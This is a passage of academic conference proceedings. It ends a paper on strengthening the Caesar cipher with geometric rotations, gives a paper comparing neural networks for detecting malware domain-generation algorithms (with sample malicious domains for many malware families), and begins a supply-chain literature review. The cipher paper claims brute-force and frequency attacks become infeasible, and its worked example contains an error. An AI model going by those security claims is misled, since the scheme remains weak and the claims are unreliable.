4 Resistance Against Attacks 4.1 Brute Force Attack The Brute force attack is considered efficient when the range of possible keys is limited, this is the case of the Caesar cryptosystem, which allows hackers to try all the 26 possible positions and disclose the message in a very short time. With our method, the complexity of finding the key and the associated algorithm is almost impossible. Indeed, the number of sub-keys depends directly on the length of the message and the random choices that the algorithm makes. Moreover, the increase of the length of the text implies directly the increase of the key to use. 4.2 Frequency Analysis Attack Being one of the mono-alphabetic cryptosystems family, Caesar cryptosystem represents a very important weakness. Indeed, with the shift performed, each letter in the original text is always mapped to the same letter in the cipher text, which makes the detection of the original message easy by doing a simple frequency analysis. Moreover, our method perfectly meets this limitation by handling each letter in a different way depending on the size of the text extracted in each round, and its position during the applied rotation.

5 Experimentation We use the message below to test our proposed method: « CIA TRIAD IS USED IN INFORMATION SECURITY MODEL» By eliminating the spaces, we obtain the following text where its size is 40 letters: « CIATRIADISUSEDININFORMATIONSECURITYMODEL» 5.1 Encrypting the Original Text Apply the Caesar cipher, choosing F = 3 as the number of positions to shift. The cipher text P0 will be: « FLDWULDGLVXVHGLQLQIRUPDWLRQVHFXULWBPRGHO» 5.2 Securing the Text with the Proposed Algorithm Choose the first geometrical shape. We take for example, a star, whose number of spikes is 10, so N1 = 10. Make an extraction E1 of P0 (starting from the left side of the text), such as the size of E1 = N1, that is 10 letters. Consider the E1 obtained is “FLDWULDGLV” and the rest of the text, P1 is “XVHGLQLQIRUPDWLRQVHFXULWBPRGHO”.

236

F. Z. Ben Chakra et al.

By placing the letters of E1 on the spikes of the geometric shape, execute a clockwise rotation:

After a clockwise rotation

Therefore, the C1 obtained is “VFLDWULDGL”; it will be stored to the end. Repeat the same procedure for the remaining text P1. Let us take the example of a triangle, where N2 = 3. The size of E2 = 3 letters. Then for N2 = 3, E2 = “XVH”, which means C2 = “HXV”, and P2 = “GLQLQIRUPDWLRQVHFXULWBPRGHO”. For the 3rd round, the chosen geometrical shape is: Nonagon, where N3 = 9, E3 = “GLQLQIRUP” and P3 = “DWLRQVHFXULWBPRGHO”. After the rotation, the C3 = “PGLQLQIRU”. For the 4th round, the geometrical shape chosen is: Octagon, where N4 = 8, E4 = “DWLRQVHF” and P4 = “XULWBPRGHO”. After the rotation, the C4 = “FDWLRQVH”. For the 5th round, the geometrical shape chosen is: Nonagon, N5 = 9, E5 = “XULWBPRGH” and P5 = “O”. After the rotation, the C5 = “HXULWBPRG”. For the 6th round, we notice that the size of P5 = 1 letter, this is the first case, so no change to make and the C6 will be “O”, with N6 = 1. The algorithm stops when the size of Pi = 0, so the final cypher text and the key to send will be as follows: C = C1 + C2 + C3 + C4 + C5 + C6. K = [F, N1, N2, N3, N4, N5, N6]. That is: C = « VFLDWULDGLHXVPGLQLQIRUFDWLRQVHHXULWBPRGO» K = [3, 10, 3, 9, 8, 9, 1] The repartition of the text according to the randomly chosen geometrical shapes enables treating each block differently, thus, each letter will not be encrypted by the same letter in cipher text, thanks to the rotation performed, which prevents the attacker from analyzing the frequency of the repeated letters or from guessing the shift key. Example: the letter C in the first extract is encrypted by the letter V, while in the fourth extract it is encrypted by the letter H. In addition, the key we generated depends mainly on the shapes, so that, the number of partitions made, and the size of our cipher text. Therefore, the random choice of geometrical shapes allows us to generate several combinations of sub-keys, and several cipher texts for the same plaintext. For our original text, we can have this key: K = [3, 2,

Securing Caesar Cryptography Using the 2D Geometry

237

4, 2, 4, 2, 4, 2, 4, 2, 4, 10], as we can also have the key: K = [3, 10, 10, 10, 10]. Thus, by increasing the size of the plaintext, the key will become more and more complicated, and the space of the sub-keys will increase accordingly. This implies directly, the infeasibility of a brute force attack. 5.3 Decryption of the Received Text The strength of our method lies in the arrival of the cipher text, and the key, of which, the attacker will not have the ability to understand if it is a simple division and shift, or a real manipulation to be done using the numbers presented, as indicated in the rest of the experimentation: Based on the associated key, we break the text into Ci blocks of size Ni, where: Size of C1 = 10 letters, so that C1 = “VFLDWULDGL”. Size of C2 = 3 letters, so that C2 = “HXV”. Size of C3 = 9 letters, so that C3 = “PGLQLQIRU”. Size of C4 = 8 letters, so that C4 = “FDWLRQVH”. Size of C5 = 9 letters, so that C5 = “HXULWBPRG”. Size of C6 = 1 letter, so that C6 = “O”. Apply a counter-clockwise rotation on each Ci. The result is: E1 = “FLDWULDGLV”. E2 = “XVH”. E3 = “GLQLQIRUP”. E4 = “DWLRQVHF”. E5 = “XULWBPRGH”. E6 = “O”, no change has occurred. Make a concatenation of the Ei found in order to build the P0. Then: P0 = “FLDWULDGLVXVHGLQLQIRUPDWLRQVHFXULWBPRGHO”. Apply the Caesar decryption, by making a reverse shift of 3 positions (first sub-key). The result is: “CIATRIADISUSEDINFORMATIONSECURITYMODEL”. By recovering the meaning of the words, we easily find the message sent: “CIA TRIAD IS USED IN INFORMATION SECURITY MODEL”.

6 Conclusion Based on the modern hybrid cryptography approach, we have proposed a very efficient method for the security of the Caesar cryptosystem, by adding a layer of manipulation to the encrypted message. Our algorithm, inspired by the simple properties of 2D geometry, allows us to strengthen the security of our message by paralyzing the hackers to decrypt it by the known methods of cryptanalysis, and by facing the weaknesses presented by the Caesar method.

238

F. Z. Ben Chakra et al.

References 1. Sniatala, P., Iyengar, S.S., Ramani, S.K.: Evolution of Smart Sensing Ecosystems with Tamper Evident Security, pp. 3–8. Springer, Cham (2021) 2. Nimbe, P., Weyori, B.A., Adekoya, A.F.: A novel classical and quantum cryptographic scheme for data encryption. Int. J. Theor. Phys. 61(3), 1–49 (2022). https://doi.org/10.1007/s10773022-05054-5 3. Touil, H., El Akkad, N., Satori, K.: Text encryption: hybrid cryptographic method using vigenere and hill ciphers. In: International Conference on Intelligent Systems and Computer Vision (ISCV) (2020) 4. Zulfadly, M., Daifiria,Akbar, M.B., Lazuly, I: Implementation of nihilist cipher algorithm in securing text data with md5 verification. In: Journal of Physics: Conference Series, vol. 1361(1) (2019). Article number 012020 5. El Akkad, N., El Hazzat, S., Saaidi, A., Satori, K.: Reconstruction of 3D scenes by camera self-calibration and using genetic algorithms. 3D Research, 6(7), 1–17 (2016) 6. Elazzaby, F., El Akkad, N., Kabbaj, S.: A new encryption approach based on four squares and Zigzag. In: The 1st International Conference on Embedded Systems and Artificial Intelligence, ESAI (2019) 7. Es-Sabry, M., Akkad, N.E., Merras, M., Saaidi, A., Satori, K.: A novel text encryption algorithm based on the two-square cipher and caesar cipher. Commun. Comput. Inf. Sci. 872, 78–88 (2018) 8. Jain, A., Dedhia, R., Patil, A.: Enhancing the security of Caesar cipher substitution method using a randomized approach for more secure communication. Int. J. Comput. Appl. 129(13), 0975–8887 (2015) 9. Mira, J., Álvarez, J.R. (eds.): IWINAC 2005. LNCS, vol. 3562. Springer, Heidelberg (2005). https://doi.org/10.1007/b137296 10. Verma, R., Dhanda, N., Nagar, V.: Enhancing security with in-depth analysis of brute-force attack on secure hashing algorithms. In: Kaiser, M.S., Bandyopadhyay, A., Ray, K., Singh, R., Nagar, V. (eds.) Proceedings of Trends in Electronics and Health Informatics. LNNS, vol. 376, pp. 513–522. Springer, Singapore (2022). https://doi.org/10.1007/978-981-16-8826-3_44 11. Radu, S., Atallah, M., Prabhakar, S.: Watermarking relational databases (2002) 12. Bibhudendra, A., et al.: Image encryption using advanced hill cipher algorithm. Int. J. Recent Trends Eng 1(1), 663–667 (2009) 13. Singh, G.: A study of encryption algorithms (RSA, DES, 3DES and AES) for information security. Int. J. Comput. Appl. 67(19) (2013) 14. Vincent, D.R.: RSA encryption algorithm - a survey on its various forms and its security level. Int. J. Pharm. Technol. 8(2), 12230–12240 (2016) 15. Bellare, M., Desai, A., Jokipii, E., Rogaway, P.: A concrete security treatment of symmetric encryption: analysis of the DES modes of operation. In: Proceedings of the 38th Symposium on Foundations of Computer Science. IEEE (1997) 16. Luciano, D., Prichett, G.: Cryptology: from caesar ciphers to public-key cryptosystems. Coll. Math. J. 18(1), 2–17 (1987) 17. Mishra, R., Mantri, J.K., Pradhan, S.: New multiphase encryption scheme for better security enhancement. In: Senjyu, T., Mahalle, P., Perumal, T., Joshi, A. (eds.) IOT with Smart Systems. SIST, vol. 251, pp. 599–606. Springer, Singapore (2022). https://doi.org/10.1007/978-98116-3945-6_59 18. Patil, K.S., Mandal, I., Rangaswamy, C.: Hybrid and adaptive cryptographic-based secure authentication approach in IoT based applications using hybrid encryption. Pervasive Mob. Comput. 82, 101552 (2022)

Securing Caesar Cryptography Using the 2D Geometry

239

19. Gahlaut, A., Bharti, A., Dogra, Y., Singh, P.: DNA based cryptography. In: Kaushik, S., Gupta, D., Kharb, L., Chahal, D. (eds.) ICICCT 2017. CCIS, vol. 750, pp. 205–215. Springer, Singapore (2017). https://doi.org/10.1007/978-981-10-6544-6_20 20. Pavithran, P., Mathew, S., Namasudra, S., Srivastava, G.: A novel cryptosystem based on DNA cryptography, hyperchaotic systems and a randomly generated Moore machine for cyber physical systems. Comput. Commun. 188, 1–12 (2022) 21. Satir, ¸ E., Kendirli, O.: A symmetric DNA encryption process with a biotechnical hardware. J. King Saud Univ. Sci. 34(3), 101838 (2022) 22. Touil, H., El Akkad, N., Satori, K.: H-rotation: secure storage and retrieval of passphrases on the authentication process. Int. J. Saf. Secur. Eng. 10(6), 785–796 (2021) 23. Touil, H., El Akkad, N., Satori, K.: Securing the storage of passwords based on the MD5 HASH transformation. In: Motahhir, S., Bossoufi, B. (eds.) ICDTA 2021. LNNS, vol. 211, pp. 495–503. Springer, Cham (2021). https://doi.org/10.1007/978-3-030-73882-2_45 24. Touil, H., Akkad, N.E., Satori, K.: Secure and guarantee QoS in a video sequence: a new approach based on TLS protocol to secure data and RTP to ensure real-time exchanges. Int. J. Saf. Secur. Eng. 11(1), 59–68 (2021)

A Comparative Study of Neural Networks Algorithms in Cyber-Security to Detect Domain Generation Algorithms Based on Mixed Classes of Data Mohamed Hassaoui(B) , Mohamed Hanini, and Said El Kafhali Faculty of Sciences and Techniques, Computer, Networks, Mobility and Modeling laboratory (IR2M), Hassan First University of Settat, Settat, Morocco [email protected], [email protected]

Abstract. Domain Generation Algorithms (DGAs) are often used to generate huge amounts of domain names to maintain command and control (C2) between the infected computer and the master bot. Blacklist approaches become ineffective way to detect DGA as the number of domain names to block are large and vary over time. Since DGAs are unexpectedly distributed, conventional approaches have trouble detecting DGAs. Several deep learning architectures that accept a series of characters as a raw input signal and automatically classify them have recently been suggested. This paper compares three neural network algorithms in cyber security systems to detect domain generation algorithm, in particular, long-short-term memory (LSTM), convolution neural network (CNN) and bidirectional long-short-term memory (biLSTM). We examine in detail these three neural network algorithms for detecting DGAs based on mixed classes of DGA data containing more than 30 classes of DGAs, and we discuss the drawbacks and strengths of each method. Keywords: Domain generation algorithms DGA CNN

1

· LSTM · BiLSTM ·

Introduction

Malware is software that infects systems in order to carry out malicious operations that are not authorized. The malware must be able to link to a command and control (C2) center in order to achieve its objectives. To do this, both the botmaster (the controller behind the C&C center) and the malware on the infected devices can use a Domain Generation Algorithm (DGA) to automatically generate hundreds or even thousands of domains. Malware then uses its local DNS server to try to resolve each of these names. One or more of these automatically produced domains will have been registered by the botmaster. Malware will gain a valid IP address and will be able to communicate with the (C2) center for these domains that have actually been registered. c The Author(s), under exclusive license to Springer Nature Switzerland AG 2023  J. Kacprzyk et al. (Eds.): AI2SD 2022, LNNS 712, pp. 240–250, 2023. https://doi.org/10.1007/978-3-031-35251-5_23

Comparative Study of Recurrent Neural Networks in Cyber-Security

241

The binary text classification challenge that we address in this research is to categorize a domain name string as malicious (i.e., generated by a DGA) or benign (i.e., not formed by a DGA). In the literature on DGA identification, deep neural networks have recently surfaced in [1–5]. They outperform typical machine learning methods in terms of accuracy, but at the cost of increasing the model’s complexity and requiring more datasets. Other deep learning approaches for character based text classification have recently been proposed, including deep neural network architectures designed for processing and classification of tweets [6,7] as well as general natural language text [8–11]. There is no systematic study available that compares the predictive accuracy of all these different modelsbased deep learning architectures, leaving one to wonder which one works best for DGA detection. To answer this open question, in this paper we compare the performance of three different recurrent deep learning architectures for the problem of detecting DGAs. This work can be considered as a general measure to accurately evaluate the performance of a three-recurrent model when the data is balanced, i.e. the same quantity of data is used for each class of DGA in the deep network architectures, which was the case for this experiment. However, there was a considerable difference between the methods in terms of accuracy. The remainder of this paper is organized as follows. Section 2 presents a short literature of DGAs and their feature extracted. Section 3 discusses the different neural recurrent network methods to detect DGA. Section 4 focuses on the evaluation methods of models for detecting DGAs and provides a comparative study. Finally, Sect. 5 concludes the paper and presents some feature work.

2

Domain Generation Algorithms

As mentioned earlier, domain generation algorithms are used to create a large number of fake domain names in order to hide the command and control server and maintain communication between the botnet and Botmaster as shown in Fig. 1. If an attacker infects a system with malware and then wants to protect their C2 server, the malware will use the DGA to generate tens of thousands of random domain names, including the C2 server address, which will already be registered. Because of the malware, the other domain names are solely for the purpose of obfuscation and concealment. Subsequently, it infiltrates and connects to the target device to acquire more commands. In this section, we will see how these DGAs are created and discuss the generated domain category and the most difficult to detect. We will see what the researchers has found regarding features of DGAs. 2.1

DGA Structures and Types

The created domains are determined on the basis of the given seed, which may contain numeric variables, actual date/time, or maybe even Tweet trends. Domain Generated Algorithm’s dynamics generally use seeded feature. In other

242

M. Hassaoui et al.

words, given an input such as date and time, a deterministic output will follow as the DGA is predefined. The challenge of deterring the DGA approach is the need to identify the malware, the DGA, and the seed in the sequence to filter the current malicious network and possible servers. Since a sophisticated threat actor has the ability to periodically change the server or location that the malware communicates to C2 in an automated fashion, the DGA increases the difficulty of controlling malicious communications. Seed functions as a mutual secret necessary for the computation of generated domains, often referred to as Algorithmic Generated Domains (DGA). It is the collated set of parameters necessary for the implementation of a DGA. Typical parameters contain numeric constants. Two seed properties have a higher value to describe the DGA: – Time dependence: Makes sure that the DGA provides a time source for the measurement of the DGAs. As a result, the created domains will have a validity time. – Determinism: Addresses the ability to observe and the availability of conditions. For most common DGAs, all parameters needed for DGA implementation are known to the point that all possible domains can be determined. Two DGAs use temporary nondeterminism to prohibit arbitrary estimation of future AGDs by using volatile but publicly available seed data.

Fig. 1. Camouflage technique using DGAs

Table 1 presents an overview of different types of domain generation algorithms DGAs As well as some examples of domain generated algorithms corresponding to each class. 2.2

DGAs Features

Feature extraction is a difficult process that has a significant influence on the accuracy and reliability of traditional machine learning detection methods. However, this process is automated in neural network algorithms, and it does not

Comparative Study of Recurrent Neural Networks in Cyber-Security

Table 1. Overview of mixed classes of DGA data with some examples. DGA family

Domain

Cryptolocker

wrdpvitewnpfv.co.uk

Type DGA

P2P

jmnlnjflrlnjfxkrhazlrnjpz.net

DGA

Post

1xhkzo0vu7c96fwf07o1o9wjau.org

DGA

Volatile

aslhplayergetadobef.co.uk

DGA

bamital

ca587e6fc0aa82b6556c176e54d40c61.org

DGA

banjori

vrxhererwyatanb.com

DGA

beebone

ns1.dnsfor18.net

DGA

chinad

3bvcn4hqs8gm9eeg.info

DGA

conficker

yvucyomg.org

DGA

corebot

qjmh1lu2kt307nu87jk.ddns.net

DGA

cryptolocker

lmnlbvkcomdoh.biz

DGA

cryptowall

usaalwayswar.com

DGA

dircrypt

cjpnivrcgsjl.com

DGA

dyre

d37b7a931cee839031c73019c78cec7bd2.in DGA

emotet

snpwmbhvvsnjoijr.eu

DGA

fobber

tjjxxfvaao.com

DGA

geodo

artgyebqtmjkfjov.eu

DGA

gspy

cbc558a69bf5ac12.net

DGA

hesperbot

nleflqnx.com

DGA

kraken

gjtwmoph.dyndns.org

DGA

locky

uhprnpxjc.ru

DGA

matsnu

hourtable-reference.com

DGA

necurs

ednyilmgbrbcbocqqg.net

DGA

none

mte.gov.br

Normal

nymaim

lwgpakhwu.info

DGA

padcrypt

ladanfdffnomeoea.net

DGA

proslikefan

mopizpeyb.in

DGA

pushdo

lumucjatesl.kz

DGA

pykspa

tkringn.org

DGA

qadars

7c1mrc5ers9a.org

DGA

qakbot

bserwvfpfqnzkn.biz

DGA

ramdo

ciyouwqqugcmqkiy.org

DGA

ramnit

ugckucagmxgyby.bid

DGA

ranbyus

gtgqvexfgtonbx.pw

DGA

rovnix

f8qlliz2qyitk5hmpl.biz

DGA

shiotob/urlzone/bebloh rkz2jgyqtbd.net

DGA

simda

nopewom.info

DGA

suppobox

theseguess.net

DGA

symmi

eqidacwakui.ddns.net

DGA

tinba

wxyuggjrvvbr.com

DGA

tofsee

dueduei.biz

DGA

vawtrak

jsdyrgne.top

DGA

virut

wxyurh.com

DGA

243

244

M. Hassaoui et al.

require any functionality or contextual information, instead relying just on domain names. We have two major kinds of features in the literature: features that are dependent on the specific execution of malware samples in an effective environment with a certain configuration and in a specified time frame, and features that are feature aware.

3 3.1

Neural Network Methods to Detect DGAs Data Collection

Researchers need a representative set of clean domain names and algorithmically generated domain names to train, validate, and test any approach. Sadly, the absence of best practices and interest in exchanging data in the field of information security between academia and business communities makes it difficult for academic researchers to access data sets. Researchers therefore need to build their own experimental data sets using the data they already gather-which might not be a simple task. In general, there are two main sources of data collection. The first is the collection of active domain name system (DNS) data and the second is the collection of passive DNS (pDNS) data. 3.2

Architectures of the Compared Models

The neural network, also known as the Artificial Neural Network (ANN), is a machine learning model inspired by the human brain, based on several basic computing components called neurons or nodes, each of which measures a simple function. The neurons are closely interlinked in a layered model. Usually, neurons are arranged so that the first layer is the input layer, the last one is the output layer, and the layers between them are the hidden layers. The typical ANN teaching technique is called backpropagation. This approach attempts to decrease the loss function, which is the difference between the measured output and the known mark, by changing the weights of the model. Each labeled sample is fed into the network, just as in the testing process; except when the output layer is reached, the algorithm measures the deviation from the known and desired output and adjusts the weights of the model so that the error is minimized. Deep learning first addressed DGA detection with work in 2016 by [1], an implementation of a Long Short-Term Memory Networks (LSTM) used for nonspecific DGA analysis, this method learn features automatically, thus offering the potential to bypass the human effort of feature engineering. Long Short-Term Memory Networks: Long short-term memory networks (LSTMs) is a type of recurrent neural network (RNN), have recently received a lot of interest due to their success in solving difficulties involving sequence processing [13]. Because domain names are made up of a series of characters, LSTMs are a natural choice for classifiers. We stick extremely close to the original model because the LSTM network proposed by [1] was created exclusively for

Comparative Study of Recurrent Neural Networks in Cyber-Security

245

Fig. 2. The architecture of the LSTM model

the identification of DGA. The network consists of a single node output layer with sigmoid activation, an embedding layer, and an LSTM layer (128 LSTM cells with default Tanh activation). The embedding layer’s job is to teach a 128-dimensional numerical vector to represent each character that might appear in a domain name. This vector is not the same as the 128-dimensional ASCII encoding. The embedding converts semantically related characters into comparable vectors, with the idea of similarity deduced (learned) from the classification job at hand. All deep neural network designs under investigation begin with such an embedding layer, as will be seen in the rest of this section. We set the parameter choices for the embedding layer, such as the dimensionality of the embedding space, same for all models to allow for a fair comparison. The architecture of this model is shown in Fig. 2, where the layers are: – – – – –

Input layer Embedding layer LSTM layer An optional dense layer Output layer

Bidirectional LSTM Models: To tackle the comparative task, we also built a binary classifier that classifies the domain as benign or malicious classifier based on biLTSM classifiers, the classifiers use an architecture that takes the domain name as input and classifies it. The architecture is shown in Fig. 3, where the layers are: – – – – –

Input layer Embedding layer LSTM layer or bidirectional LSTM An optional dense layer Output layer

246

M. Hassaoui et al.

Fig. 3. The architecture of the biLSTM model

CNN Model: A CNN is a deep learning model that uses local area features to achieve exceptional performance in the field of image recognition. A CNN is made up of two neural networks: a feature extraction network and a classification network. First, the feature extraction stage executes convolutional and pooling layers repeatedly, extracting data characteristics automatically. The convolutional layer, which is at the heart of a CNN, maps many filters (or kernels) to the input data in order to select the best filter (i.e., to find features well). It generates feature maps by resizing the filters and executing a convolutional operation between them and the entire input data. CNN is typically used to extract features from images, but it is also feasible to utilize CNN to encode a series of strings. To convert input to output, only a few distinct layers are required; especially the main layers are convolutional, pooling, and fully connected. Each of these layers has its own set of parameters that can be optimized. The architecture of the CNN model is shown in Fig. 4, where the layers are: – – – –

Embedding layer CNN layer An optional dense layer Output layer

4 4.1

Evaluation Implementation Details

Several python and sapark libraries were used in the comparative study, including pandas [14], numpy, keras [15], scikit-learn [16], enchant, PySpark [17] and MLlib [18]. Because Pandas data contains extremely valuable properties and can work more easily with Python libraries, we switched from Spark data type to Pandas data and inversely whenever desired in this implementation.

Comparative Study of Recurrent Neural Networks in Cyber-Security

247

Fig. 4. The architecture of the CNN model

Fig. 5. Data splitting

4.2

Resultat

We trained and evaluated and tested the models on a data-set with 1 million mixed classes of domain names as represented in Table 1 and split-ed as represented in Fig. 5 the ratio of the split is 60:20:20. That is, 60% of the data will be sent to the Training Set, 20% to the Validation Set and the rest to the Test Set. Bi-LSTM achieved 97.9% of accuracy, 97.7% the accuracy of LSTM and 79.6% CNN accuracy. Figures 6, 7, 8 represents the training of the model according to the number of epochs in use of EarlyStopping that stop training when a monitored metric has stopped improving, and we note that all models stop improving at 35 epochs at most.

248

M. Hassaoui et al.

Fig. 6. bi-LSTM model accuracy

Fig. 7. LSTM model accuracy

In the test of the model we achieve the accuracy as shown in the Fig. 9 Bi-LSTM model produces more accurate classification results, than individual multi-layer perceptron CNN or LSTM models.

Comparative Study of Recurrent Neural Networks in Cyber-Security

249

Fig. 8. CNN model accuracy

Fig. 9. Comparison of accuracy between models

5

Conclusion and Feature Works

DGA detection, i.e. the classification task of distinguishing between benign domain names and those generated by malware (Domain Generation Algorithms) has become a central topic in information security. In this paper, we have compared three different deep neural network architectures that perform this classification. The proposed comparison demonstrates the efficiency of Bi-LSTM and LSTM in the detection of malicious domain names generated using DGAs, unlike CNN, which shows poor efficiency.

250

M. Hassaoui et al.

References 1. Woodbridge, J., Anderson, H.S., Ahuja, A., Grant, D.: Predicting domain generation algorithms with long short-term memory networks (2016). https://arxiv.org/ abs/1611.00791 2. Saxe, J., Berlin, K.: eXpose: a character-level convolutional neural network with embeddings for detecting malicious URLs, file paths and registry keys (2017). https://doi.org/10.48550/arXiv.1702.08568 3. Yu, B., Gray, D.L., Pan, J., De Cock, M., Nascimento, A.C.: Inline DGA detection with deep networks. In: 2017 IEEE International Conference on Data Mining Workshops (ICDMW), pp. 683–692. IEEE, November 2017 4. Thakur, K., Alqahtani, H., Kumar, G.: An intelligent algorithmically generated domain detection system. Comput. Electr. Eng. 92, 107129 (2021) 5. Highnam, K., Puzio, D., Luo, S., Jennings, N.R.: Real-time detection of dictionary DGA network traffic using deep learning. SN Comput. Sci. 2(2), 1–17 (2021) 6. Dhingra, B., Zhou, Z., Fitzpatrick, D., Muehl, M., Cohen, W.W.: Tweet2vec: character-based distributed representations for social media. In: Proceedings of the 54th Annual Meeting of the Association for Computational Linguistics, vol. 2, pp. 269–274 (2016) 7. Vosoughi, S., Vijayaraghavan, P., Roy, D.: Tweet2vec: learning tweet embeddings using character-level CNN-LSTM encoder-decoder. In Proceedings of the 39th International ACM SIGIR Conference on Research and Development in Information Retrieval, pp. 1041–1044, July 2016 8. Lavanya, P.M., Sasikala, E.: Deep learning techniques on text classification using Natural language processing (NLP) in social healthcare network: a comprehensive survey. In: 2021 3rd International Conference on Signal Processing and Communication (ICPSC), pp. 603–609. IEEE, May 2021 9. Zhang, X., Zhao, J., LeCun, Y.: Character-level convolutional networks for text classification. In: Advances in Neural Information Processing Systems, vol. 28, pp. 649–657 (2015) 10. Kowsari, K., Jafari Meimandi, K., Heidarysafa, M., Mendu, S., Barnes, L., Brown, D.: Text classification algorithms: a survey. Information 10(4), 150 (2019) 11. Akhter, M.P., Jiangbin, Z., Naqvi, I.R., Abdelmajeed, M., Fayyaz, M.: Exploring deep learning approaches for Urdu text classification in product manufacturing. Enterp. Inf. Syst. 16(2), 223–248 (2022) 12. Aviv, A.J., Haeberlen, A.: Challenges in experimenting with botnet detection systems. In: 4th Workshop on Cyber Security Experimentation and Test (CSET 2011), p. 6 (2011) 13. Hochreiter, S., Schmidhuber, J.: Long short-term memory. Neural Comput. 9(8), 1735–1780 (1997) 14. McKinney, P.: A foundational Python library for data analysis and statistics, Python high perform. Sci. Comput. (14), 1–9 (2011) 15. Gulli, A., Pal, S.:Deep Learning with Keras. Packt Publishing Ltd., Birmingham (2017) 16. Varoquaux, G., Buitinck, L., Louppe, G., Grisel, O., Pedregosa, F., Mueller, A.: Scikit-learn: machine learning without learning the machinery. GetMobile: Mob. Comput. Commun. 19(1), 29–33 (2015) 17. Drabas, T., Lee, D.: Learning PySpark. Packt Publishing Ltd., Birmingham (2017) 18. Meng, X., et al.: Mllib: machine learning in apache spark. J. Mach. Learn. Res. 17(1), 1235–1241 (2016)

A Literature Review of Digital Technologies in Supply Chains Rachid El Gadrouri(B) National School of Commerce and Management, Ibn Zohr University, Agadir, Morocco [email protected]

Abstract. Digital technologies, a phenomenon that has been in search for a few years. This appearance is linked to the implementation and the dynamization of the industry 4.0, to the progress of the digital technologies but also to the specificities of the competition context, particularly in terms of complexity, uncertainty and great dynamics. Therefore, in order to be able to do so, companies must now integrate digital technologies into their supply chain management systems because they create a competitive advantage through the availability of the product offer, the reduction of costs but also the increase of market shares. They also enable the integration of practices that improve access to information, increase responsiveness and collaboration capabilities, and even agility. This article examines, through a systematic review, what the scientific community says about the main technologies and characteristics of digital technology adoption in supply chains. Keywords: Supply Chain · Digital technology · Technology adoption

1 Introduction The recent technological progress illustrated by the emergence of a range of digital technological tools has concerned the consideration of firms and scientific academics, because the use of these emerging technologies can present significant opportunities for the supply chain, particularly in improving the connection between information flows, goods flows, financial flows and also the flow of people [1], while creating a new mode of supply chain management. This phenomenon is called the Digital Supply Chain (DSC), also known as Supply Chain 4.0, which is unveiled as the application of digital technologies to the Internet of Things, advanced robotics, Big Data analysis in supply chain management while creating automated networks to significantly improve performance and customer satisfaction [2]. Otherwise, these technologies have the ability to reform supply chains into more agile and resilient networks because they improve performance in key supply chain qualities such as partnership, clearness, suppleness, reaction and efficiency. The implementation of digital technologies in supply chains is a developing concept resulting from a transformational approach to supply chain management that uses disruptive Industry 4.0 technologies to rationalize supply chain processes, activities, and © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 J. Kacprzyk et al. (Eds.): AI2SD 2022, LNNS 712, pp. 251–265, 2023. https://doi.org/10.1007/978-3-031-35251-5_24

252

R. El Gadrouri

relationships to generate significant strategic benefits for all supply chain stakeholders [3]. Some see it as an ecosystem of mass and customized (digital and physical) products and services, through data mining and data trends, even predicting customer need lifecycles, adapting their operations for quick and optimal responses [3]. However, other researchers argue that there are two aspects to this concept: the first relates to the implementation of novel numerical tools in supply chain processes that enable the creation of business relationships with suppliers and customers, while the second relates to the roles of these technologies in transforming supply chain capabilities and operational performance [4]. Similarly, [5] have defined DSC as the development of data structures then the implementation of advanced tools that improve supply chain integration and agility, thereby improving purchaser facility and viable organizational performance. However, before this phenomenon quickly and widely aroused interest in theoretical and empirical research, it was the result of remarkable historical transformations, depending on different global circumstances: historical, human, natural and societal [6]. This author has made clear, in this sense that the advent of digital technologies or the era of digitalization is even outdated, after this post-pandemic period that has been a real test for: sustainability, resilience, agility and integration of supply chains. He argues for a new reflection of a model called Viable supply chain. Moreover, the scientific literature on this subject is not limited to the conceptualization of the notion itself, but the theoretical and empirical research conducted has tried to demonstrate the relationships and intersections between digital technologies and supply chain management. Notably, [7] and [8] have respectively conducted empirical studies on the adoption of Big Data Analytics (BDA) in the supply chain and also on the relationship between the determinants of Blockchain (BC) adoption and supply chain performance; [9] studied the employment of Industry 4.0 technologies in the supply chain; [10] theoretically explored the obstacles to implementation of blockchain (BC) tools on sustainable supply chain; [11] clarified the disruptions of Industry 4.0 technologies on supply chain operations and managing; [4] developed a conceptual framework of the Digital Supply Chain; [12] established a conception of the supply chain activated by Blockchain (BC) technology. Very recently the covid-19 pandemic has expanded the field of scientific research into other aspects of the supply chain, particularly resilience, sustainability, and agility [13], while taking advantage of the circumstances of this everevolving sphere of digitalization; [11] disrupt the management of all phases of the supply chains [14], for example the development of transactions and the conquest of new partners in the relationship: Buyers-Suppliers, while using digital technologies. At the similar period, the adoption of numerical tools will certainly face obstacles impacting the application of supply chain technologies due to various organizational, operational and financial constraints. Therefore, this paper aims to deliver a state of the art on the emerging practice of digital technologies in supply chains. First, it provides an overview of the different digital tools involved in supply chain management, as well as their benefits and characteristics. Second, it provides a review of studies focused on the acceptance of digital technologies in the supply chain in order to motivate researchers and practitioners to give greater concern to this topic.

A Literature Review of Digital Technologies in Supply Chains

253

2 Literature Review and Background 2.1 Digital Technologies of the Supply Chain The proliferation of digital technologies and their use will allow companies to create savings in production process costs, as well as create new types of jobs [15]. The era of digitalization has enabled the implementation of a range of digital technologies, which have impacted supply chain management, which has also led to the development of innovative features of the supply chain. The scientific literature on the subject [7, 11, 16–24], cited specifically digital technologies that have the role of developing a supply chain with respect to: Artificial Intelligence (AI), Cloud Computing (CC), Cyber Security Systems (CPS), Big Data analytics (BDA), Blockchain (BC), Internet of Things (IoT), and Robotization (R). We have illustrated through (see Table 1) some definitions from the literature on digital technologies in supply chain. Table 1. Digital Technologies in supply chain Tools

Sources

Description

Cyber Systems Security (CSS)

[25]

Network structure with implanted strategies (sensors) allowing self-management of physical processes and their feedback

[26]

Digital technologies that control physical processes not only in one direction, but also linked to feedback loops with the system, while allowing real-time harmonization of information and physical flows

[27]

A global approach to obtaining actionable information to create a competitive advantage that differs from the business analysis approach in terms of 5V: volume, variety, speed, truthfulness and value

[28]

Allows data to be collected from a variety of sources and fully analyzed, allowing immediate-time choice making based on the results of the data analysis

[29]

The procedure of using analysis algorithms to expose capacities concealed in big data, such as hidden patterns or unknown correlations

[30]

Are tools based on intelligence, while referring to theories and techniques

[31, 32]

Production system that uses machines that fully imitate the tasks performed by human labor

Big Data Analytics (BDA)

Artificial Intelligence (IA)

(continued)

254

R. El Gadrouri Table 1. (continued)

Tools

Internet of things (IoT)

Blockchain (BC)

Robotization (R)

Sources

Description

[33, 34]

Artificial intelligence is any device or facility that uses computer skills to operate as or replace employees

[35]

An internet-based technical infrastructure that enables the transfer of goods and services in the international supply chain network

[36]

